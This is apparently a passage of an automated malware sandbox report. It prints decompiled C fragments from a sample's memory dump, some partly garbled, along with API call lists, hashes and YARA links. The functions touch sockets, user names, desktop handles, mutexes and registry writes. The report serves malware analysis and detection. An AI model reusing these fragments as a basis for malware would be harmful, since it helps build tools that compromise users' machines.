Opcode Fuzzy Hash: 5a713a6511f967623ef35da4a5e0ea8751c61ea8cfb49bf1952489cee9351166
Instruction Fuzzy Hash: 432127313483406AD320AB619C45FEB77A8ABD4708F50092FFA8467192D7BCB985866F

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00409C70() {
				void* _t20;
				signed char _t22;
				intOrPtr _t23;
				signed int _t30;
				void* _t31;
				intOrPtr _t33;
				signed int _t34;
				signed int _t36;
				void* _t38;
				void* _t47;
				void* _t48;
				signed int _t50;
				signed int _t51;
				void* _t65;

				_t22 = _t20 + 0x64000000 - 0x73;
				asm("fild dword [ecx+edi*4]");
				_pop(_t31);
				asm("loopne 0xffffffa7");
				asm("outsb");
				_t48 = _t47 + 1;
				asm("stc");
				_pop(ss);
				asm("pushfd");
				if(( *(_t36 + 0x2c) & _t36) >= 0) {
					L4:
					asm("fisttp qword [cs:ecx-0x5aec6c7e]");
					 *((intOrPtr*)(_t38 + 0x67d11336)) =  *((intOrPtr*)(_t38 + 0x67d11336)) + _t31;
					_t23 = _t33;
					_t34 = _t22;
					asm("sbb ah, [ecx]");
					 *0x66db7d16 = _t23;
					_t50 = _t48 + 1 - 1;
					asm("lodsd");
					_push(_t23);
					asm("iretd");
					if (_t50 <= 0) goto L10;
					_t51 = _t50 | _t34;
				}
				asm("fnsave [edx-0x80]");
				_t22 = _t22 ^ 0x7f0d9e70;
				 *(_t36 + 0x6f) =  *(_t36 + 0x6f) >> 0xa8;
				asm("movsb");
				_t36 = 0x61c19319;
				 *0x950eaf52 =  *0x950eaf52 << 1;
				 *(_t31 - 0x5a) =  *(_t31 - 0x5a) ^ _t30;
				asm("fnsave [esi]");
				asm("adc al, 0x53");
				 *(_t31 + 0x5efd6f05) =  *(_t31 + 0x5efd6f05) | _t22;
				asm("outsd");
				asm("std");
				_t38 = _t30;
				_t65 = _t65 +  *_t30;
				_t33 = _t33 + 1;
				asm("int1");
				 *(_t33 - 0x22d1722e) =  *(_t33 - 0x22d1722e) << 1;
				goto L4;
			}

0x00409c77
0x00409c79
0x00409c7c
0x00409c7d
0x00409c7f
0x00409c80
0x00409c86
0x00409c87
0x00409c88
0x00409c8c
0x00409cc4
0x00409cc4
0x00409ccb
0x00409cd1
0x00409cd1
0x00409cd2
0x00409cd5
0x00409cda
0x00409cdb
0x00409cdc
0x00409cdd
0x00409cde
0x00409cdf
0x00409cdf
0x00409c8f
0x00409c92
0x00409c98
0x00409c9f
0x00409ca0
0x00409ca5
0x00409cad
0x00409cb0
0x00409cb2
0x00409cb6
0x00409cb9
0x00409cba
0x00409cbb
0x00409cbc
0x00409cbe
0x00409cbf
0x00409cc0
0x00000000

APIs

shutdown.WS2_32(?,00000002), ref: 00409C59
closesocket.WS2_32(00000000), ref: 00409C60

Strings

p0u, xrefs: 00409C60

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocketshutdown
String ID: p0u
API String ID: 572888783-1742372003
Opcode ID: 6b278a7d7483e1dbb20f6112268c221df131b023618c8fb8f908042752422de0
Instruction ID: 9e88bcd4747d794709045ff0263b36523ae87ad1a44ea35881fbb89dcc29c897
Opcode Fuzzy Hash: 6b278a7d7483e1dbb20f6112268c221df131b023618c8fb8f908042752422de0
Instruction Fuzzy Hash: 6411BD7180C2409BD7208B3848996ABBBA16F83714B24866FE0D36B2D3CB365847D30D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA69, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040CA69(signed int __eax, intOrPtr __edx, struct HINSTANCE__** __edi, void* _a5, intOrPtr _a25, void* _a61, void* _a69, void* _a1081) {
				void* _v0;
				void* _v7;
				void* _t27;
				void* _t30;
				struct HINSTANCE__** _t33;
				void* _t35;
				void* _t36;

				_t33 = __edi;
				_t36 = _t35 + 1;
				_push(__eax & 0x00000018);
				_push(0x20000);
				_push(0x271d);
				_a25 = __edx;
				_t30 = E00418930(__edi);
				__eflags = __bl;
				if(__bl == 0) {
					L1:
					if( *((char*)(_t36 + 0xb)) == 1) {
						_t27 =  *_t33;
						if(_t27 != 0) {
							HeapFree( *0x42e6d4, 0, _t27);
						}
						 *_t33 = 0;
					}
					goto L5;
				} else {
					__eflags =  *(__esp + 0x444) & 0x00000010;
					if(( *(__esp + 0x444) & 0x00000010) == 0) {
						L15:
						__eflags = __bl;
						if(__bl == 0) {
							goto L1;
						} else {
							__eflags =  *(__esp + 0x444) & 0x00000020;
							if(__eflags == 0) {
								L5:
								return _t30;
							} else {
								__eax = E0040C650(__eflags, __edi, 2);
								__eax = E0040C650(__eflags, __edi, 0x17);
								__al = __bl;
								__esp = __esp + 0x438;
								return __eax;
							}
						}
					} else {
						__eax = GetModuleFileNameW(0, __esp + 0x54, 0x103);
						 *(__esp + 0x10) = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							__edx = 0;
							__eflags = 0;
							 *((short*)(__esp + 0x54 + __eax * 2)) = __dx;
							__esp + 0x58 = E004189F0(__esp + 0x58, 0, __edi, 0x271e);
							__bl = __al;
						}
						 *(__esp + 0x10) = 0x104;
						__eflags = __bl;
						if(__bl == 0) {
							goto L1;
						} else {
							__eax = __esp + 0x10;
							__imp__GetUserNameExW(2, __esp + 0x54, __esp + 0x10);
							__eflags = __al;
							if(__al != 0) {
								__eax =  *(__esp + 0x10);
								__eflags = __eax;
								if(__eax != 0) {
									__edx = 0;
									__eflags = 0;
									ds = 0x271f;
									asm("daa");
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
									 *((short*)(__esp + 0x54 + __eax * 2)) = __dx;
									_push(__edi);
									__esp + 0x58 = E004189F0(__esp + 0x58, 0);
									__bl = __al;
								}
							}
							goto L15;
						}
					}
				}
			}

0x0040ca69
0x0040ca69
0x0040ca6c
0x0040ca6d
0x0040ca72
0x0040ca79
0x0040ca82
0x0040ca84
0x0040ca86
0x0040c9b2
0x0040c9b7
0x0040c9b9
0x0040c9bd
0x0040c9c8
0x0040c9c8
0x0040c9ce
0x0040c9ce
0x00000000
0x0040ca8c
0x0040ca8c
0x0040ca94
0x0040cb0e
0x0040cb0e
0x0040cb10
0x00000000
0x0040cb16
0x0040cb16
0x0040cb1e
0x0040c9d4
0x0040c9de
0x0040cb24
0x0040cb27
0x0040cb2f
0x0040cb35
0x0040cb38
0x0040cb3e
0x0040cb3e
0x0040cb1e
0x0040ca96
0x0040caa2
0x0040caa8
0x0040caac
0x0040caae
0x0040cab0
0x0040cab0
0x0040cab7
0x0040cac1
0x0040cac6
0x0040cac6
0x0040cac8
0x0040cad0
0x0040cad2
0x00000000
0x0040cad8
0x0040cad8
0x0040cae4
0x0040caea
0x0040caec
0x0040caee
0x0040caf2
0x0040caf4
0x0040caf6
0x0040caf6
0x0040caf9
0x0040cafa
0x0040cafb
0x0040cafb
0x0040cafd
0x0040cb02
0x0040cb07
0x0040cb0c
0x0040cb0c
0x0040caf4
0x00000000
0x0040caec
0x0040cad2
0x0040ca94

APIs

HeapFree.KERNEL32(?,00000000,00000000), ref: 0040C9C8
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0040CAA2
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040CAE4

Part of subcall function 004189F0: HeapFree.KERNEL32(?,00000000,00000000,?,00020000,00000000,00000000,0000FDE9,00000001,?,00000000,00000001), ref: 00418A5C

Strings

, xrefs: 0040CB16

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapName$FileModuleUser
String ID:
API String ID: 1194275196-3916222277
Opcode ID: 348f0bc5c6b19061968c28490614f2a89fb13ef815b0d3cdef9dde92904bacfd
Instruction ID: c8e6262bda34ec06b99c229ea51e3cc8dd4e96b7d08c9d905e172eaa573f1141
Opcode Fuzzy Hash: 348f0bc5c6b19061968c28490614f2a89fb13ef815b0d3cdef9dde92904bacfd
Instruction Fuzzy Hash: 9D11E97128538099E324DB149986BF7B7D89FC1700F080A2FB9C4AB2D2D7B8D949C71E

Uniqueness

Uniqueness Score: -1.00%

Function 00426C50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00426C50() {
				long _v0;
				int _v4;
				long _v8;
				char _v668;
				char _v796;
				char _v896;
				short _v908;

				if(( *0x42e8f8 & 0x00000004) == 0 || WaitForSingleObject( *0x42edbc, 0) == 0) {
					return OpenInputDesktop();
				}
				E0041D150( &_v796);
				E00416E10(0x42eb70,  &_v668,  *0x42e904,  &_v896, 0);
				return OpenDesktopW( &_v908, _v8, _v4, _v0);
			}

0x00426c5d
0x00426cd0
0x00426cd0
0x00426c75
0x00426c99
0x00426cc7

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00426C67

Part of subcall function 00416E10: StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6

OpenDesktopW.USER32(?,?,?,?), ref: 00426CBB

Strings

pB, xrefs: 00426C94

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopFromObjectOpenSingleStringWait
String ID: pB
API String ID: 216972675-3059159000
Opcode ID: 99138766b19f612f3a886d3c9f6c18f41d736e775cd0fe2d9c5575123fe09194
Instruction ID: b17eb2865fddb33ced454ab6c76f5136ffce983a0157157bfb71dead6b8550c4
Opcode Fuzzy Hash: 99138766b19f612f3a886d3c9f6c18f41d736e775cd0fe2d9c5575123fe09194
Instruction Fuzzy Hash: 1EF0C8B56043009BD325DB95DD49FAB73ACEB84304F44C96EF554832A0EB34A908CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A5C0(void* __edi) {
				char _v348;
				char _v488;
				void* __esi;
				void* _t3;
				void* _t11;

				_t11 = 0;
				if(__edi != 0 &&  *0x42eb64 > 1) {
					E0041D1B0( &_v488);
					E00412640( &_v348, __edi, 0x74);
					_t11 = E00416610(0x42e704, 3, __edi, 0x74);
				}
				_t3 =  *0x42e718;
				ReleaseMutex(_t3);
				CloseHandle(_t3);
				return _t11;
			}

0x0041a5c7
0x0041a5cc
0x0041a5db
0x0041a5ea
0x0041a603
0x0041a603
0x0041a605
0x0041a60d
0x0041a614
0x0041a624

APIs

ReleaseMutex.KERNEL32(?,?,00000000), ref: 0041A60D
CloseHandle.KERNEL32(?), ref: 0041A614

Part of subcall function 00416610: RegCreateKeyExW.ADVAPI32(80000001,0042E720,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00416633
Part of subcall function 00416610: RegSetValueExW.ADVAPI32(00000074,?,00000000,?,00000074,?), ref: 00416658
Part of subcall function 00416610: RegCloseKey.ADVAPI32(00000000), ref: 00416669

Strings

B, xrefs: 0041A5F9

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$CreateHandleMutexReleaseValue
String ID: B
API String ID: 2820475446-2386870291
Opcode ID: f8dae9de48923e6aeb684e078815865e2f706662ccc734a1dcc659831f45ce99
Instruction ID: 40ac7b7ec7862ba636a4e254e2e02dcc9e9ad155a2fa53d1baafd584cfe54921
Opcode Fuzzy Hash: f8dae9de48923e6aeb684e078815865e2f706662ccc734a1dcc659831f45ce99
Instruction Fuzzy Hash: C8F02731E812606AD730A735FD05FCA2B689B81704F48002BB948A31A1CB7D6585C66E

Uniqueness

Uniqueness Score: -1.00%

Function 00409C10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00409C10(intOrPtr __edi, void* __eflags) {
				char _v1;
				char _v2;
				char _v6;
				void* __ebx;
				void* __esi;
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr _t16;

				_t16 = __edi;
				_v2 = 0;
				if(E00414B90(1, __edi, 0,  &_v1) == 0) {
					L5:
					_t15 = _v2;
					L6:
					if(_t16 != 0xffffffff) {
						__imp__#22(_t16, 2);
						__imp__#3(_t16);
					}
					return _t15;
				}
				_t11 = _v1;
				if(_t11 != 5) {
					if(_t11 == 4) {
						_v6 = E00409910(__edi);
					}
					goto L5;
				}
				_t15 = E00408E30(__edi);
				goto L6;
			}

0x00409c10
0x00409c1f
0x00409c2b
0x00409c4d
0x00409c4d
0x00409c51
0x00409c54
0x00409c59
0x00409c60
0x00409c60
0x00409c6b
0x00409c6b
0x00409c2d
0x00409c33
0x00409c41
0x00409c49
0x00409c49
0x00000000
0x00409c41
0x00409c3b
0x00000000

APIs

Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01

shutdown.WS2_32(?,00000002), ref: 00409C59
closesocket.WS2_32(00000000), ref: 00409C60

Part of subcall function 00408E30: getsockname.WS2_32 ref: 00408E57
Part of subcall function 00408E30: send.WS2_32(?,?,00000002,00000000), ref: 00408EF2

Strings

p0u, xrefs: 00409C60

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocketgetsocknamerecvselectsendshutdown
String ID: p0u
API String ID: 2490758381-1742372003
Opcode ID: 71e3522ff757223584397774523be0b5670f76a930a6a28377ab2ea6a4090753
Instruction ID: e69e2262a9a857875bbc1c846421c30207f7fa369dc4313419db9e7e763becae
Opcode Fuzzy Hash: 71e3522ff757223584397774523be0b5670f76a930a6a28377ab2ea6a4090753
Instruction Fuzzy Hash: 90E0E57140C10069E6212B149D89AFB67DD8BD6354F04461FF4A6A72D6C7388D469266

Uniqueness

Uniqueness Score: -1.00%

Function 004152D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON

Download Yara Rule

APIs

shutdown.WS2_32(00000000,00000002), ref: 004152D8
closesocket.WS2_32(00000000), ref: 004152DF

Strings

p0u, xrefs: 004152DF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocketshutdown
String ID: p0u
API String ID: 572888783-1742372003
Opcode ID: 165ecc4e025a529bb96640957f92f0761924c95a63f633aa32a4d19160e000fa
Instruction ID: 181046a8456e24b48acba9caec537d767fa61d6a7dad923b4ffd5351d5b66c5d
Opcode Fuzzy Hash: 165ecc4e025a529bb96640957f92f0761924c95a63f633aa32a4d19160e000fa
Instruction Fuzzy Hash: 42B09232602820B7CB1127685E0DADE3714AB82321B100360F973B90F0673809468A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B060, Relevance: 5.2, APIs: 4, Instructions: 163
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040B060(WCHAR* __edx, void* __edi, void* __ebp, void* __eflags) {
				char _v2104;
				char _v2112;
				void* _v2116;
				void* _v2120;
				intOrPtr _v2124;
				void* _v2128;
				long _v2132;
				long _v2136;
				intOrPtr _v2140;
				long _v2144;
				void* _v2148;
				signed int _v2152;
				void* __ebx;
				void* __esi;
				void* _t55;
				void* _t60;
				signed int _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t75;
				long _t77;
				void* _t79;
				void* _t83;
				char* _t84;
				void* _t87;
				void* _t95;
				signed int _t96;
				void* _t99;
				void* _t101;
				long _t104;
				void* _t108;
				long _t109;
				void* _t110;
				char* _t111;
				signed int _t114;
				signed int _t118;
				void** _t119;

				_t99 = __edi;
				_t119 =  &_v2148;
				_t83 = 0;
				_v2144 = 0;
				if(E00418040(0, __edx,  &_v2128) == 0) {
					return 0;
				} else {
					_t108 = _v2128;
					_t114 = E00411430(_v2124, _t108,  &_v2148, 1, 0);
					_v2152 = _t114;
					if(_t108 != 0) {
						VirtualFree(_t108, 0, 0x8000);
					}
					_t55 = _v2120;
					if(_t55 != 0) {
						CloseHandle(_t55);
					}
					if(_t114 == 0xffffffff) {
						return _t83;
					} else {
						_t95 = _t114 - (0x38e38e39 * _t114 >> 0x20 >> 1) + (0x38e38e39 * _t114 >> 0x20 >> 1) * 8;
						_push(_t99);
						if(_t95 != 0) {
							L8:
							_t87 = _v2148;
						} else {
							_t15 = _t95 + 0x24; // 0x24
							E004240C0(_t15,  &_v2128);
							E004240C0(0x25,  &_v2112);
							_t68 = 0;
							_t96 = 0;
							_v2140 = 0;
							if(_t114 != 0) {
								while(1) {
									_t87 = _v2148;
									_t104 =  *((intOrPtr*)(_t87 + _t68 * 4));
									_v2132 = _t104;
									if(_t104 == 0 ||  *_t104 == 0) {
										break;
									}
									_t110 =  *(_t87 + 4 + _t68 * 4);
									_v2116 = _t110;
									if(_t110 == 0 ||  *_t110 == 0) {
										break;
									} else {
										_t118 =  *(_t87 + 8 + _t68 * 4);
										if(_t118 == 0 ||  *_t118 == 0) {
											break;
										} else {
											if(E00411B20(_t68 | _t96 | 0xffffffff, _t118, _t96 | 0xffffffff, _t96) == 0) {
												L29:
												_push(_t110);
												_push(_t104);
												_t111 =  &_v2104;
												_t73 = E00411D70(_t72, 0x838, _t111,  &_v2112);
												if(_t73 == 0xffffffff) {
													goto L34;
												} else {
													_push(_t73);
													_t84 = _t111;
													_t75 = E00410E60( &_v2144, _t84);
													_t119 = _t84;
													 *_t75 =  *_t75 + _t75;
													if(_t75 == 0) {
														goto L34;
													} else {
														_t77 = _v2144 + 9;
														_t96 = _t118;
														_v2144 = _t77;
														if(_t77 < _v2140) {
															_t68 = _v2144;
															continue;
														} else {
															_t83 = _v2148;
															goto L8;
														}
													}
												}
											} else {
												_push(_t118);
												_t79 = E00411D70( &_v2128, 0x838,  &_v2104,  &_v2128);
												_t119 =  &(_t119[2]);
												if(_t79 == 0xffffffff) {
													L34:
													_t83 = 0;
													goto L8;
												} else {
													_push(_t79);
													if(E00410E60( &_v2144,  &_v2104) == 0) {
														goto L34;
													} else {
														_t104 = _v2136;
														_t110 = _v2120;
														goto L29;
													}
												}
											}
										}
									}
									goto L40;
								}
								_t69 = _v2144;
								if(_t69 != 0) {
									HeapFree( *0x42e6d4, 0, _t69);
									_t87 = _v2148;
								}
								_t83 = 0;
							} else {
								goto L8;
							}
						}
						_t109 = _v2136;
						if(_t87 != 0 && _t109 != 0) {
							_t101 = _t87;
							do {
								_t60 =  *(_t101 + _t109 * 4 - 4);
								_t109 = _t109 - 1;
								if(_t60 != 0) {
									HeapFree( *0x42e6d4, 0, _t60);
								}
							} while (_t109 != 0);
							if(_t101 != 0) {
								HeapFree( *0x42e6d4, _t109, _t101);
							}
						}
						return _t83;
					}
				}
				L40:
			}

0x0040b060
0x0040b060
0x0040b068
0x0040b070
0x0040b07b
0x0040b271
0x0040b081
0x0040b081
0x0040b098
0x0040b09a
0x0040b0a0
0x0040b0a9
0x0040b0a9
0x0040b0af
0x0040b0b5
0x0040b0b8
0x0040b0b8
0x0040b0c1
0x0040b266
0x0040b0c7
0x0040b0d5
0x0040b0d7
0x0040b0d8
0x0040b100
0x0040b100
0x0040b0da
0x0040b0de
0x0040b0e1
0x0040b0ef
0x0040b0f4
0x0040b0f6
0x0040b0f8
0x0040b0fe
0x0040b154
0x0040b154
0x0040b158
0x0040b15b
0x0040b161
0x00000000
0x00000000
0x0040b170
0x0040b174
0x0040b17a
0x00000000
0x0040b189
0x0040b189
0x0040b18f
0x00000000
0x0040b19f
0x0040b1ae
0x0040b1e4
0x0040b1e4
0x0040b1e5
0x0040b1f0
0x0040b1f4
0x0040b1ff
0x00000000
0x0040b201
0x0040b201
0x0040b202
0x0040b208
0x0040b20a
0x0040b20b
0x0040b20f
0x00000000
0x0040b211
0x0040b215
0x0040b218
0x0040b21a
0x0040b222
0x0040b150
0x00000000
0x0040b228
0x0040b228
0x00000000
0x0040b228
0x0040b222
0x0040b20f
0x0040b1b0
0x0040b1b4
0x0040b1bf
0x0040b1c4
0x0040b1ca
0x0040b231
0x0040b231
0x00000000
0x0040b1cc
0x0040b1cc
0x0040b1da
0x00000000
0x0040b1dc
0x0040b1dc
0x0040b1e0
0x00000000
0x0040b1e0
0x0040b1da
0x0040b1ca
0x0040b1ae
0x0040b18f
0x00000000
0x0040b17a
0x0040b238
0x0040b23e
0x0040b24a
0x0040b250
0x0040b250
0x0040b254
0x00000000
0x00000000
0x00000000
0x0040b0fe
0x0040b104
0x0040b10a
0x0040b116
0x0040b118
0x0040b118
0x0040b11c
0x0040b11f
0x0040b12a
0x0040b12a
0x0040b12c
0x0040b132
0x0040b13d
0x0040b13d
0x0040b132
0x0040b14b
0x0040b14b
0x0040b0c1
0x00000000

APIs

Part of subcall function 00418040: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418061
Part of subcall function 00418040: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,00000003,00000000,00000000,?,0041D962,?,?,00000000), ref: 00418075

Part of subcall function 00411430: HeapFree.KERNEL32(?,-00000004,00000000), ref: 004114D4

VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,00000001,00000000), ref: 0040B0A9
CloseHandle.KERNEL32(?,?,00000001,00000001,00000000), ref: 0040B0B8
HeapFree.KERNEL32(?,00000000,?,?,?,00000001,00000001,00000000), ref: 0040B12A
HeapFree.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000), ref: 0040B13D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$Heap$File$CloseCreateHandleSizeVirtual
String ID:
API String ID: 2389364983-0
Opcode ID: fac159570df7226fff70e317c8295474b059019319a9be6bc5d7294f1c3a799e
Instruction ID: 738deeaa71a2111c705e03e4577929242107141a57f72d0824cb3cb4b324c82a
Opcode Fuzzy Hash: fac159570df7226fff70e317c8295474b059019319a9be6bc5d7294f1c3a799e
Instruction Fuzzy Hash: 2D510E316043059BC720DE19DC40A6FB7A8EB84754F44066EB994AB3D1EB38EC0A87DA

Uniqueness

Uniqueness Score: -1.00%

Function 00411980, Relevance: 5.1, APIs: 4, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,00000000,00000000,?), ref: 00411A06
HeapAlloc.KERNEL32(?,00000008,?), ref: 00411A21
HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 00411A32
HeapFree.KERNEL32(?,00000000,00000000), ref: 00411AD5

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFree
String ID:
API String ID: 1379380650-0
Opcode ID: d3fcbb3d26129e2615d2e9ec1dff6688171a272c8c6eca272db7835b662cefbe
Instruction ID: efe8cfb9891cde2f04f359c0ca46ce458e47275684ad433623618f2cc334728f
Opcode Fuzzy Hash: d3fcbb3d26129e2615d2e9ec1dff6688171a272c8c6eca272db7835b662cefbe
Instruction Fuzzy Hash: F941E5746153019BDB349F95D980BB777A4EF91384F44443BEA818A3B0EB78DC86C39A

Uniqueness

Uniqueness Score: -1.00%

Function 00410B60, Relevance: 5.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,00000000,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BBD
HeapAlloc.KERNEL32(?,00000008,?,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BD9
HeapReAlloc.KERNEL32(?,00000008,00000000,?,00000000,?,00000000,00411DE0,00000000,?,?,?,00000000,?,00412C21,?), ref: 00410BEB
wvnsprintfW.SHLWAPI(?,-00000200,?,?), ref: 00410C08

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Freewvnsprintf
String ID:
API String ID: 630057495-0
Opcode ID: 06b151a10dca0020f576444ca280bcff8727da00dad94cb59d292c431d72672e
Instruction ID: 97b3807e9e53e5b58170f0607886a35fdc9c8b13c719680ff7e1dba9e78ccd1e
Opcode Fuzzy Hash: 06b151a10dca0020f576444ca280bcff8727da00dad94cb59d292c431d72672e
Instruction Fuzzy Hash: 232160716083069FD724CFA4D884FA773A8FB54308F50892EE911CB290EB74E9D5C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB30, Relevance: 5.1, APIs: 4, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040AB4A
HeapFree.KERNEL32(?,00000000,?), ref: 0040AB66

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

HeapFree.KERNEL32(?,00000000,?,?), ref: 0040AB85
HeapFree.KERNEL32(?,00000000,00000000,?), ref: 0040ABD0

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 6df2fcd46d12ed536a77d3c01bec24b7c1a15628f583977b178cf0ea54117bc2
Instruction ID: 3596076b850d2e2ae7ba5a12881e59a0d1e49e9bba0e01a461f9c5e57939d9a3
Opcode Fuzzy Hash: 6df2fcd46d12ed536a77d3c01bec24b7c1a15628f583977b178cf0ea54117bc2
Instruction Fuzzy Hash: B3218E757002028BC738DF1AD980B6773B9EB98315B94403EA60997291D738F952CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00423760, Relevance: 5.0, APIs: 4, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0042EDE8,00000001,00425105), ref: 00423768
HeapFree.KERNEL32(?,00000000,?), ref: 0042378C

Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34

LeaveCriticalSection.KERNEL32(0042EDE8), ref: 004237A1
LeaveCriticalSection.KERNEL32(0042EDE8,00000000,000000FF), ref: 004237BC

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ByteCharHeapLeaveMultiWide$AllocEnterFree
String ID:
API String ID: 2861695539-0
